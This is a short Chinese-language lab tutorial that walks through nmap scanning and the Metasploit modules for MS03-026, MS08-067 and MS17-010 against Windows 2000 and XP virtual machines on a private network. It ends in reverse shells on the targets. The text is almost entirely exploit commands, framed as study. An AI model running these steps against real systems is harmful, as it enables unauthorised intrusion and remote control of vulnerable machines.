文章的目的在于学习和技术上的交流,请遵守相关的法律法规。
实验内容:使用 kali2020,基于ms漏洞,对xp和win2000进行攻击
实验准备:打开kali, xp,win2000的虚拟机,分别通过 ifconfig, ipconfig获取各自的ip值
kali: 192.168.31.124
2000: 192.168.31.174
xp: 192.168.31.199
通过
nmap -sP 192.168.31.174
可以探测IP为192.168.31.174的主机是否在线
nmap -sT 192.168.21.174
连接扫描可以查看,靶机开放了哪些端口
实验一:MS03-026 攻击 WIN2000
search ms03-026
use exploit/windows/dcerpc/ms03_026_dcom
show options // 查看设置
set rhost 192.168.31.174 // 设置靶机IP
set lhost 192.168.31.124 // 设置本机IP,避免本地有多个IP地址时的错乱
run // 也可以使用exploit
sysinfo // 查看靶机信息
shell // 获取一个靶机的shell窗口
MS03-026攻击 WIN2000
实验二: MS08-067 攻击 XP
search ms08-067
use exploit/windows/smb/ms08_067_netapi
set rhost 192.168.31.199
set lhost 192.168.31.124
show options // 显示攻击配置
show targets // 显示目标系统
set target 10// 手动设置是为了避免自动的甄别错误
show options
run
MS08-067 攻击XP
实验三:MX17- 010 攻击 XP
先开启XP的admin$共享
net share //查看是否有admin$ ,没有的话使用下一条语句开启
net share admin$
search ms17-010
use exploit/windows/smb/ms17_010_psexec
check 192.168.31.199 // 检测是否有漏洞
set rhost 192.168.31.199
set lhost 192.168.31.124
show options
run
MX17- 010 攻击 XP
